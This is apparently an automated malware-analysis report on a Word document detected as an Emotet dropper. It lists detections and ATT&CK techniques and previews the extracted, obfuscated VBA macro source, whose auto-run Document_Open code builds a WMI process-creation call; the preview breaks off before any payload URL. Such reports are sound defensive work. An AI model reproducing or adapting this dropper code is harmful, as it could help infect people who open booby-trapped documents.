MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for Emotet. The ClamAV detection name 'Doc.Dropper.EmotetIOS-9402070-0' strongly suggests Emotet. The macros likely execute code to download and run a secondary payload, a hallmark of Emotet droppers.
Heuristics 6
-
ClamAV: Doc.Dropper.EmotetIOS-9402070-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.EmotetIOS-9402070-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16213 bytes |
SHA-256: 58029508ecef74b3fcf3b15f6596f5dd43fa06e572eeee4af1ca7c08f1b5f25d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Y8wi6j3re60"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
X1jcat8bj69 = Array(Hkghng2mjrje + "Gdnc0dhaqpxSo3lh5sh6asrp3c I3qqfb3qu0l3" + E67tyx4_bcy38hiv, Rhbbyz0hpzwm2is2sy, Aobvj39yx0cf.Jbaye53kgeag, Q93fkgl14zj5 + "Wyle1ytg8mj0gyk Dbptc908b37n0gsf6 Lc8ob5f_1ws Csa6xy5lr91p")
End Sub
Attribute VB_Name = "Aobvj39yx0cf"
Attribute VB_Base = "0{B5C515F1-D675-4F08-86DA-787E5FE3BCF8}{8D73C291-A9EE-4579-8A46-A557ACEFB6C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Jbaye53kgeag()
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JHNklHS
Fau7uko5s_qvrslth = Atn(ihKLNsad)
Fau7uko5s_qvrslth = Log(323)
Case "Gnw38uyvfyo99kd25j"
Fau7uko5s_qvrslth = 288262913
Fau7uko5s_qvrslth = u23ioyhiggukjjs
End Select
Select Case Ca5fot23y8e
Case "Rb2jt6j0yjs6z5cjqf"
Fau7uko5s_qvrslth = 88383833333#
Fau7uko5s_qvrslth = (qwlhusaidbwq)
Case "B08v9qiiif3_zby1"
Fau7uko5s_qvrslth = lkqwhnekqwn
Fau7uko5s_qvrslth = Log(345345)
Fau7uko5s_qvrslth = Atn(jsghi2lklqw)
Fau7uko5s_qvrslth = smbdjlsblkhwqewqd
End Select
Kvnllc589wk = 105
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JHNklHS
Fau7uko5s_qvrslth = Atn(ihKLNsad)
Fau7uko5s_qvrslth = Log(323)
Case "Gnw38uyvfyo99kd25j"
Fau7uko5s_qvrslth = 288262913
Fau7uko5s_qvrslth = u23ioyhiggukjjs
End Select
Select Case Ca5fot23y8e
Case "Rb2jt6j0yjs6z5cjqf"
Fau7uko5s_qvrslth = 88383833333#
Fau7uko5s_qvrslth = (qwlhusaidbwq)
Case "B08v9qiiif3_zby1"
Fau7uko5s_qvrslth = lkqwhnekqwn
Fau7uko5s_qvrslth = Log(345345)
Fau7uko5s_qvrslth = Atn(jsghi2lklqw)
Fau7uko5s_qvrslth = smbdjlsblkhwqewqd
End Select
Rjy6rjxptk3xmqq_ = Chr$(Kvnllc589wk + (10))
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JHNklHS
Fau7uko5s_qvrslth = Atn(ihKLNsad)
Fau7uko5s_qvrslth = Log(323)
Case "Gnw38uyvfyo99kd25j"
Fau7uko5s_qvrslth = 288262913
Fau7uko5s_qvrslth = u23ioyhiggukjjs
End Select
Select Case Ca5fot23y8e
Case "Rb2jt6j0yjs6z5cjqf"
Fau7uko5s_qvrslth = 88383833333#
Fau7uko5s_qvrslth = (qwlhusaidbwq)
Case "B08v9qiiif3_zby1"
Fau7uko5s_qvrslth = lkqwhnekqwn
Fau7uko5s_qvrslth = Log(345345)
Fau7uko5s_qvrslth = Atn(jsghi2lklqw)
Fau7uko5s_qvrslth = smbdjlsblkhwqewqd
End Select
Cbtk2k88c_jy_1_ = "b3bb 17t2 fvhvhjb3bb 17t2 fvhvhjwb3bb 17t2 fvhvhjib3bb 17t2 fvhvhjnmb3bb 17t2 fvhvhjb3bb 17t2 fvhvhjgmb3bb 17t2 fvhvhjtb3bb 17t2 fvhvhjb3bb 17t2 fvhvhj" + Rjy6rjxptk3xmqq_ + "b3bb 17t2 fvhvhjb3bb 17t2 fvhvhj:b3bb 17t2 fvhvhjwb3bb 17t2 fvhvhjinb3bb 17t2 fvhvhjb3bb 17t2 fvhvhj3b3bb 17t2 fvhvhj2b3bb 17t2 fvhvhj_b3bb 17t2 fvhvhj" + Aobvj39yx0cf.Wybwegjc6e0r7 + "b3bb 17t2 fvhvhjrob3bb 17t2 fvhvhjb3bb 17t2 fvhvhjceb3bb 17t2 fvhvhjsb3bb 17t2 fvhvhjsb3bb 17t2 fvhvhj"
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JHNklHS
Fau7uko5s_qvrslth = Atn(ihKLNsad)
Fau7uko5s_qvrslth = Log(323)
Case "Gnw38uyvfyo99kd25j"
Fau7uko5s_qvrslth = 288262913
Fau7uko5s_qvrslth = u23ioyhiggukjjs
End Select
Select Case Ca5fot23y8e
Case "Rb2jt6j0yjs6z5cjqf"
Fau7uko5s_qvrslth = 88383833333#
Fau7uko5s_qvrslth = (qwlhusaidbwq)
Case "B08v9qiiif3_zby1"
Fau7uko5s_qvrslth = lkqwhnekqwn
Fau7uko5s_qvrslth = Log(345345)
Fau7uko5s_qvrslth = Atn(jsghi2lklqw)
Fau7uko5s_qvrslth = smbdjlsblkhwqewqd
End Select
N8l5de12k2e53e5ts0 = T0r4vnpw2jk534(Cbtk2k88c_jy_1_)
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JH
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.